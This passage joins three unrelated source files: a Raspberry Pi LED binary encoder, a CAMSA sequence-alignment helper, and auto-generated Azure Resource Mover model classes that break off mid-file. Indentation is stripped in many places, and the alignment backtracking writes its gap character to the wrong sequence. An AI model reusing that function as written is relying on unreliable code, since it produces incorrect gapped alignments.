"""Library of functions for encoding a number in LEDs."""
import RPi.GPIO as GPIO
def light(pin):
GPIO.output(pin, GPIO.HIGH)
def clear(pinlist):
for p in pinlist:
GPIO.output(p, GPIO.LOW)
def encode(n, pinlist):
    """Display n in binary on the LEDs: LED i is lit when bit i of n is set."""
    clear(pinlist)
    for i, p in enumerate(pinlist):
        if (n >> i) % 2:
            light(p)
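# A minimal demo sketch, assuming four LEDs wired to the BCM pins listed
# below; the pin numbers are illustrative, adjust them to your wiring.
if __name__ == "__main__":
    import time
    LED_PINS = [17, 27, 22, 23]
    GPIO.setmode(GPIO.BCM)
    for pin in LED_PINS:
        GPIO.setup(pin, GPIO.OUT)
    encode(13, LED_PINS)  # 13 = 0b1101, so LEDs 0, 2 and 3 light up
    time.sleep(5)         # hold the pattern so it is visible
    GPIO.cleanup()        # release the pins on exit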
# Source file: fourleds.py | repo: zimolzak/Raspberry-Pi-newbie | license: MIT | size: 338 bytes
# -*- coding: utf-8 -*-
def get_alignments(iseq, jseq, backtracking, end_cell):
iseq_r = []
jseq_r = []
current_cell_v = backtracking[end_cell[0]][end_cell[1]]
current_cell_index = end_cell
while current_cell_v != "s":
if current_cell_v == "u":
jseq_r.append("-")
iseq_r.append(iseq[current_cell_index[0] - 1])
current_cell_index = (current_cell_index[0] - 1, current_cell_index[1])
elif current_cell_v == "l":
jseq_r.append("-")
jseq_r.append(jseq[current_cell_index[1] - 1])
current_cell_index = (current_cell_index[0], current_cell_index[1] - 1)
else:
iseq_r.append(iseq[current_cell_index[0] - 1])
jseq_r.append(jseq[current_cell_index[1] - 1])
current_cell_index = (current_cell_index[0] - 1, current_cell_index[1] - 1)
current_cell_v = backtracking[current_cell_index[0]][current_cell_index[1]]
return "".join(reversed(iseq_r)), "".join(reversed(jseq_r))
def get_consensus_sequences(aligned_seqs):
result = []
for fl, sl in zip(*aligned_seqs):
if fl == "-":
candidate = sl
elif sl == "-":
candidate = fl
elif fl == "N":
candidate = sl
elif sl == "N":
candidate = fl
elif sl == fl:
candidate = sl
else:
candidate = "N"
result.append(candidate)
return "".join(result)
def substitute_score(letter1, letter2):
    """Return the substitution cost: 0 for a match or the wildcard "N", else 1."""
    if letter1 == "N" or letter2 == "N" or letter1 == letter2:
        return 0
    return 1
def bounded_alignment(seq1, seq2, max_edit_distance=-1):
if max_edit_distance == -1:
max_edit_distance = max(len(seq1), len(seq2))
i_range = len(seq1) + 1
j_range = len(seq2) + 1
M = [[0] * j_range for _ in range(i_range)]
Mbt = [["s" for _ in range(j_range)] for _ in range(i_range)]
for j in range(1, j_range):
M[0][j] = j
Mbt[0][j] = "l"
for i in range(1, i_range):
M[i][0] = i
Mbt[i][0] = "u"
for i in range(1, i_range):
for j in range(1, j_range):
if abs(i - j) > max_edit_distance:
continue
options = [(M[i - 1][j - 1] + substitute_score(seq1[i - 1], seq2[j - 1]), "d")]
if abs(i - j) < max_edit_distance:
options.append((M[i - 1][j] + 1, "u"))
options.append((M[i][j - 1] + 1, "l"))
else:
if i > j:
options.append((M[i - 1][j] + 1, "u"))
else:
options.append((M[i][j - 1] + 1, "l"))
result = min(options, key=lambda entry: entry[0])
M[i][j] = result[0]
Mbt[i][j] = result[1]
if M[-1][-1] > max_edit_distance:
return AlignmentResult(seq1=seq1, seq2=seq2, consensus=None, al_seq1=None, al_seq2=None, edit_distance=M[-1][-1])
aligned_seqs = get_alignments(iseq=seq1, jseq=seq2, backtracking=Mbt, end_cell=(i_range - 1, j_range - 1))
consensus_seq = get_consensus_sequences(aligned_seqs=aligned_seqs)
return AlignmentResult(seq1=seq1, seq2=seq2, consensus=consensus_seq, al_seq1=aligned_seqs[0], al_seq2=aligned_seqs[1], edit_distance=M[-1][-1])
class AlignmentResult(object):
def __init__(self, seq1, seq2, consensus, al_seq1, al_seq2, edit_distance):
self.seq1 = seq1
self.seq2 = seq2
self.al_seq1 = al_seq1
self.al_seq2 = al_seq2
self.consensus = consensus
self.edit_distance = edit_distance
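# A small illustrative check of the banded aligner on two arbitrary short
# sequences. Mismatched letters collapse to "N" in the consensus, while "N"
# itself matches anything at zero cost.
if __name__ == "__main__":
    result = bounded_alignment("ACGTN", "ACTTA", max_edit_distance=2)
    print(result.al_seq1)        # ACGTN
    print(result.al_seq2)        # ACTTA
    print(result.consensus)      # ACNTA ("G" vs "T" disagrees; "N" defers to "A")
    print(result.edit_distance)  # 1 (only the "G" vs "T" substitution costs anything)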
# Source file: camsa/utils/fasta/algo.py | repo: compbiol/CAMSA | license: MIT | size: 3,576 bytes
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Dict, List, Optional, Union
import msrest.serialization
from ._resource_mover_service_api_enums import *
class AffectedMoveResource(msrest.serialization.Model):
"""The RP custom operation error info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The affected move resource id.
:vartype id: str
:ivar source_id: The affected move resource source id.
:vartype source_id: str
:ivar move_resources: The affected move resources.
:vartype move_resources: list[~resource_mover_service_api.models.AffectedMoveResource]
"""
_validation = {
'id': {'readonly': True},
'source_id': {'readonly': True},
'move_resources': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'source_id': {'key': 'sourceId', 'type': 'str'},
'move_resources': {'key': 'moveResources', 'type': '[AffectedMoveResource]'},
}
def __init__(
self,
**kwargs
):
super(AffectedMoveResource, self).__init__(**kwargs)
self.id = None
self.source_id = None
self.move_resources = None
class AutomaticResolutionProperties(msrest.serialization.Model):
"""Defines the properties for automatic resolution.
:param move_resource_id: Gets the MoveResource ARM ID of
the dependent resource if the resolution type is Automatic.
:type move_resource_id: str
"""
_attribute_map = {
'move_resource_id': {'key': 'moveResourceId', 'type': 'str'},
}
def __init__(
self,
*,
move_resource_id: Optional[str] = None,
**kwargs
):
super(AutomaticResolutionProperties, self).__init__(**kwargs)
self.move_resource_id = move_resource_id
class ResourceSettings(msrest.serialization.Model):
"""Gets or sets the resource settings.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AvailabilitySetResourceSettings, DiskEncryptionSetResourceSettings, VirtualMachineResourceSettings, KeyVaultResourceSettings, LoadBalancerResourceSettings, NetworkInterfaceResourceSettings, NetworkSecurityGroupResourceSettings, PublicIPAddressResourceSettings, VirtualNetworkResourceSettings, SqlServerResourceSettings, SqlDatabaseResourceSettings, SqlElasticPoolResourceSettings, ResourceGroupResourceSettings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
     Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
_subtype_map = {
'resource_type': {'Microsoft.Compute/availabilitySets': 'AvailabilitySetResourceSettings', 'Microsoft.Compute/diskEncryptionSets': 'DiskEncryptionSetResourceSettings', 'Microsoft.Compute/virtualMachines': 'VirtualMachineResourceSettings', 'Microsoft.KeyVault/vaults': 'KeyVaultResourceSettings', 'Microsoft.Network/loadBalancers': 'LoadBalancerResourceSettings', 'Microsoft.Network/networkInterfaces': 'NetworkInterfaceResourceSettings', 'Microsoft.Network/networkSecurityGroups': 'NetworkSecurityGroupResourceSettings', 'Microsoft.Network/publicIPAddresses': 'PublicIPAddressResourceSettings', 'Microsoft.Network/virtualNetworks': 'VirtualNetworkResourceSettings', 'Microsoft.Sql/servers': 'SqlServerResourceSettings', 'Microsoft.Sql/servers/databases': 'SqlDatabaseResourceSettings', 'Microsoft.Sql/servers/elasticPools': 'SqlElasticPoolResourceSettings', 'resourceGroups': 'ResourceGroupResourceSettings'}
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(ResourceSettings, self).__init__(**kwargs)
self.resource_type = None # type: Optional[str]
self.target_resource_name = target_resource_name
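# Illustrative sketch of the polymorphic dispatch above: msrest uses the
# discriminator declared in ``_subtype_map`` (here ``resource_type``) to pick
# the concrete sub-class when deserializing. The payload below is hypothetical.
#
#     settings = ResourceSettings.deserialize({
#         'resourceType': 'Microsoft.Compute/availabilitySets',
#         'targetResourceName': 'avset-target',
#     })
#     assert isinstance(settings, AvailabilitySetResourceSettings)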
class AvailabilitySetResourceSettings(ResourceSettings):
"""Gets or sets the availability set resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
     Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param fault_domain: Gets or sets the target fault domain.
:type fault_domain: int
:param update_domain: Gets or sets the target update domain.
:type update_domain: int
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
'fault_domain': {'minimum': 1},
'update_domain': {'maximum': 20, 'minimum': 1},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'fault_domain': {'key': 'faultDomain', 'type': 'int'},
'update_domain': {'key': 'updateDomain', 'type': 'int'},
}
def __init__(
self,
*,
target_resource_name: str,
fault_domain: Optional[int] = None,
update_domain: Optional[int] = None,
**kwargs
):
super(AvailabilitySetResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Compute/availabilitySets' # type: str
self.fault_domain = fault_domain
self.update_domain = update_domain
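# A hedged construction example: ``fault_domain`` and ``update_domain`` must
# satisfy the ``_validation`` bounds above (both >= 1, update_domain <= 20).
# The name and values are illustrative only.
#
#     avset = AvailabilitySetResourceSettings(
#         target_resource_name='avset-target',
#         fault_domain=2,
#         update_domain=5,
#     )
#     body = avset.serialize()  # checks the bounds and emits camelCase keys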
class AzureResourceReference(msrest.serialization.Model):
"""Defines reference to an Azure resource.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
**kwargs
):
super(AzureResourceReference, self).__init__(**kwargs)
self.source_arm_resource_id = source_arm_resource_id
class BulkRemoveRequest(msrest.serialization.Model):
"""Defines the request body for bulk remove of move resources operation.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Gets or sets the list of resource Id's, by default it accepts move
resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
validate_only: Optional[bool] = None,
move_resources: Optional[List[str]] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(BulkRemoveRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
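# An illustrative request body: by default ``move_resources`` holds
# move-resource ARM IDs; passing source IDs instead requires switching the
# input type. The ID below is a made-up placeholder.
#
#     req = BulkRemoveRequest(
#         validate_only=True,
#         move_resources=['/subscriptions/.../moveResources/demo-vm'],
#         move_resource_input_type='MoveResourceId',
#     )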
class CloudErrorBody(msrest.serialization.Model):
"""An error response from the service.
:param code: An identifier for the error. Codes are invariant and are intended to be consumed
programmatically.
:type code: str
:param message: A message describing the error, intended to be suitable for display in a user
interface.
:type message: str
:param target: The target of the particular error. For example, the name of the property in
error.
:type target: str
:param details: A list of additional details about the error.
:type details: list[~resource_mover_service_api.models.CloudErrorBody]
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[CloudErrorBody]'},
}
def __init__(
self,
*,
code: Optional[str] = None,
message: Optional[str] = None,
target: Optional[str] = None,
details: Optional[List["CloudErrorBody"]] = None,
**kwargs
):
super(CloudErrorBody, self).__init__(**kwargs)
self.code = code
self.message = message
self.target = target
self.details = details
class CommitRequest(msrest.serialization.Model):
"""Defines the request body for commit operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(CommitRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class DiscardRequest(msrest.serialization.Model):
"""Defines the request body for discard operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(DiscardRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class DiskEncryptionSetResourceSettings(ResourceSettings):
"""Defines the disk encryption set resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
     Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(DiskEncryptionSetResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Compute/diskEncryptionSets' # type: str
class Display(msrest.serialization.Model):
"""Contains the localized display information for this particular operation / action. These
    values will be used by several clients for
(1) custom role definitions for RBAC;
(2) complex query filters for the event service; and
(3) audit history / records for management operations.
:param provider: Gets or sets the provider.
The localized friendly form of the resource provider name – it is expected to also
include the publisher/company responsible.
It should use Title Casing and begin with "Microsoft" for 1st party services.
e.g. "Microsoft Monitoring Insights" or "Microsoft Compute.".
:type provider: str
:param resource: Gets or sets the resource.
The localized friendly form of the resource related to this action/operation – it
should match the public documentation for the resource provider.
It should use Title Casing.
This value should be unique for a particular URL type (e.g. nested types should *not*
reuse their parent’s display.resource field)
e.g. "Virtual Machines" or "Scheduler Job Collections", or "Virtual Machine VM Sizes"
or "Scheduler Jobs".
:type resource: str
:param operation: Gets or sets the operation.
The localized friendly name for the operation, as it should be shown to the user.
It should be concise (to fit in drop downs) but clear (i.e. self-documenting).
It should use Title Casing.
Prescriptive guidance: Read Create or Update Delete 'ActionName'.
:type operation: str
:param description: Gets or sets the description.
The localized friendly description for the operation, as it should be shown to the
user.
It should be thorough, yet concise – it will be used in tool tips and detailed views.
Prescriptive guidance for namespace:
Read any 'display.provider' resource
Create or Update any 'display.provider' resource
Delete any 'display.provider' resource
Perform any other action on any 'display.provider' resource
Prescriptive guidance for namespace:
Read any 'display.resource' Create or Update any 'display.resource' Delete any
'display.resource' 'ActionName' any 'display.resources'.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
provider: Optional[str] = None,
resource: Optional[str] = None,
operation: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(Display, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class Identity(msrest.serialization.Model):
"""Defines the MSI properties of the Move Collection.
:param type: The type of identity used for the resource mover service. Possible values include:
"None", "SystemAssigned", "UserAssigned".
:type type: str or ~resource_mover_service_api.models.ResourceIdentityType
:param principal_id: Gets or sets the principal id.
:type principal_id: str
:param tenant_id: Gets or sets the tenant id.
:type tenant_id: str
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
}
def __init__(
self,
*,
type: Optional[Union[str, "ResourceIdentityType"]] = None,
principal_id: Optional[str] = None,
tenant_id: Optional[str] = None,
**kwargs
):
super(Identity, self).__init__(**kwargs)
self.type = type
self.principal_id = principal_id
self.tenant_id = tenant_id
class JobStatus(msrest.serialization.Model):
"""Defines the job status.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar job_name: Defines the job name. Possible values include: "InitialSync".
:vartype job_name: str or ~resource_mover_service_api.models.JobName
:ivar job_progress: Gets or sets the monitoring job percentage.
:vartype job_progress: str
"""
_validation = {
'job_name': {'readonly': True},
'job_progress': {'readonly': True},
}
_attribute_map = {
'job_name': {'key': 'jobName', 'type': 'str'},
'job_progress': {'key': 'jobProgress', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobStatus, self).__init__(**kwargs)
self.job_name = None
self.job_progress = None
class KeyVaultResourceSettings(ResourceSettings):
"""Defines the key vault resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
     Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(KeyVaultResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.KeyVault/vaults' # type: str
class LBBackendAddressPoolResourceSettings(msrest.serialization.Model):
"""Defines load balancer backend address pool properties.
:param name: Gets or sets the backend address pool name.
:type name: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
**kwargs
):
super(LBBackendAddressPoolResourceSettings, self).__init__(**kwargs)
self.name = name
class LBFrontendIPConfigurationResourceSettings(msrest.serialization.Model):
"""Defines load balancer frontend IP configuration properties.
:param name: Gets or sets the frontend IP configuration name.
:type name: str
    :param private_ip_address: Gets or sets the IP address of the Load Balancer. This is only
specified if a specific
private IP address shall be allocated from the subnet specified in subnetRef.
:type private_ip_address: str
:param private_ip_allocation_method: Gets or sets PrivateIP allocation method (Static/Dynamic).
:type private_ip_allocation_method: str
:param subnet: Defines reference to subnet.
:type subnet: ~resource_mover_service_api.models.SubnetReference
:param zones: Gets or sets the csv list of zones.
:type zones: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'privateIpAllocationMethod', 'type': 'str'},
'subnet': {'key': 'subnet', 'type': 'SubnetReference'},
'zones': {'key': 'zones', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
private_ip_address: Optional[str] = None,
private_ip_allocation_method: Optional[str] = None,
subnet: Optional["SubnetReference"] = None,
zones: Optional[str] = None,
**kwargs
):
super(LBFrontendIPConfigurationResourceSettings, self).__init__(**kwargs)
self.name = name
self.private_ip_address = private_ip_address
self.private_ip_allocation_method = private_ip_allocation_method
self.subnet = subnet
self.zones = zones
class ProxyResourceReference(AzureResourceReference):
"""Defines reference to a proxy resource.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(ProxyResourceReference, self).__init__(source_arm_resource_id=source_arm_resource_id, **kwargs)
self.name = name
class LoadBalancerBackendAddressPoolReference(ProxyResourceReference):
"""Defines reference to load balancer backend address pools.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(LoadBalancerBackendAddressPoolReference, self).__init__(source_arm_resource_id=source_arm_resource_id, name=name, **kwargs)
class LoadBalancerNatRuleReference(ProxyResourceReference):
"""Defines reference to load balancer NAT rules.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(LoadBalancerNatRuleReference, self).__init__(source_arm_resource_id=source_arm_resource_id, name=name, **kwargs)
class LoadBalancerResourceSettings(ResourceSettings):
"""Defines the load balancer resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
     Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param sku: Gets or sets load balancer sku (Basic/Standard).
:type sku: str
:param frontend_ip_configurations: Gets or sets the frontend IP configurations of the load
balancer.
:type frontend_ip_configurations:
list[~resource_mover_service_api.models.LBFrontendIPConfigurationResourceSettings]
:param backend_address_pools: Gets or sets the backend address pools of the load balancer.
:type backend_address_pools:
list[~resource_mover_service_api.models.LBBackendAddressPoolResourceSettings]
:param zones: Gets or sets the csv list of zones common for all frontend IP configurations.
Note this is given
precedence only if frontend IP configurations settings are not present.
:type zones: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'str'},
'frontend_ip_configurations': {'key': 'frontendIPConfigurations', 'type': '[LBFrontendIPConfigurationResourceSettings]'},
'backend_address_pools': {'key': 'backendAddressPools', 'type': '[LBBackendAddressPoolResourceSettings]'},
'zones': {'key': 'zones', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
sku: Optional[str] = None,
frontend_ip_configurations: Optional[List["LBFrontendIPConfigurationResourceSettings"]] = None,
backend_address_pools: Optional[List["LBBackendAddressPoolResourceSettings"]] = None,
zones: Optional[str] = None,
**kwargs
):
super(LoadBalancerResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/loadBalancers' # type: str
self.sku = sku
self.frontend_ip_configurations = frontend_ip_configurations
self.backend_address_pools = backend_address_pools
self.zones = zones
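# A sketch of composing the nested load-balancer settings defined above; all
# names and values are hypothetical, and only optional fields that avoid
# cross-resource references are shown.
#
#     lb = LoadBalancerResourceSettings(
#         target_resource_name='lb-target',
#         sku='Standard',
#         frontend_ip_configurations=[
#             LBFrontendIPConfigurationResourceSettings(
#                 name='frontend-1',
#                 private_ip_allocation_method='Dynamic',
#             ),
#         ],
#         backend_address_pools=[
#             LBBackendAddressPoolResourceSettings(name='pool-1'),
#         ],
#         zones='1',
#     )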
class ManualResolutionProperties(msrest.serialization.Model):
"""Defines the properties for manual resolution.
:param target_id: Gets or sets the target resource ARM ID of the dependent resource if the
     resolution type is Manual.
:type target_id: str
"""
_attribute_map = {
'target_id': {'key': 'targetId', 'type': 'str'},
}
def __init__(
self,
*,
target_id: Optional[str] = None,
**kwargs
):
super(ManualResolutionProperties, self).__init__(**kwargs)
self.target_id = target_id
class MoveCollection(msrest.serialization.Model):
"""Define the move collection.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource.
:vartype type: str
:ivar etag: The etag of the resource.
:vartype etag: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: The geo-location where the resource lives.
:type location: str
:param identity: Defines the MSI properties of the Move Collection.
:type identity: ~resource_mover_service_api.models.Identity
:param properties: Defines the move collection properties.
:type properties: ~resource_mover_service_api.models.MoveCollectionProperties
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'properties': {'key': 'properties', 'type': 'MoveCollectionProperties'},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
location: Optional[str] = None,
identity: Optional["Identity"] = None,
properties: Optional["MoveCollectionProperties"] = None,
**kwargs
):
super(MoveCollection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.etag = None
self.tags = tags
self.location = location
self.identity = identity
self.properties = properties
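# Putting the pieces together: a minimal, illustrative move collection.
# Server-populated fields (id, name, type, etag) stay None on the client;
# the regions and identity type below are placeholder values.
#
#     collection = MoveCollection(
#         location='eastus2',
#         identity=Identity(type='SystemAssigned'),
#         properties=MoveCollectionProperties(
#             source_region='eastus',
#             target_region='westus',
#         ),
#     )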
class MoveCollectionProperties(msrest.serialization.Model):
"""Defines the move collection properties.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param source_region: Required. Gets or sets the source region.
:type source_region: str
:param target_region: Required. Gets or sets the target region.
:type target_region: str
:ivar provisioning_state: Defines the provisioning states. Possible values include:
"Succeeded", "Updating", "Creating", "Failed".
:vartype provisioning_state: str or ~resource_mover_service_api.models.ProvisioningState
:ivar errors: Defines the move collection errors.
:vartype errors: ~resource_mover_service_api.models.MoveCollectionPropertiesErrors
"""
_validation = {
'source_region': {'required': True},
'target_region': {'required': True},
'provisioning_state': {'readonly': True},
'errors': {'readonly': True},
}
_attribute_map = {
'source_region': {'key': 'sourceRegion', 'type': 'str'},
'target_region': {'key': 'targetRegion', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'errors': {'key': 'errors', 'type': 'MoveCollectionPropertiesErrors'},
}
def __init__(
self,
*,
source_region: str,
target_region: str,
**kwargs
):
super(MoveCollectionProperties, self).__init__(**kwargs)
self.source_region = source_region
self.target_region = target_region
self.provisioning_state = None
self.errors = None
class MoveResourceError(msrest.serialization.Model):
"""An error response from the azure resource mover service.
:param properties: The move resource error body.
:type properties: ~resource_mover_service_api.models.MoveResourceErrorBody
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceErrorBody'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceErrorBody"] = None,
**kwargs
):
super(MoveResourceError, self).__init__(**kwargs)
self.properties = properties
class MoveCollectionPropertiesErrors(MoveResourceError):
"""Defines the move collection errors.
:param properties: The move resource error body.
:type properties: ~resource_mover_service_api.models.MoveResourceErrorBody
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceErrorBody'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceErrorBody"] = None,
**kwargs
):
super(MoveCollectionPropertiesErrors, self).__init__(properties=properties, **kwargs)
class MoveCollectionResultList(msrest.serialization.Model):
"""Defines the collection of move collections.
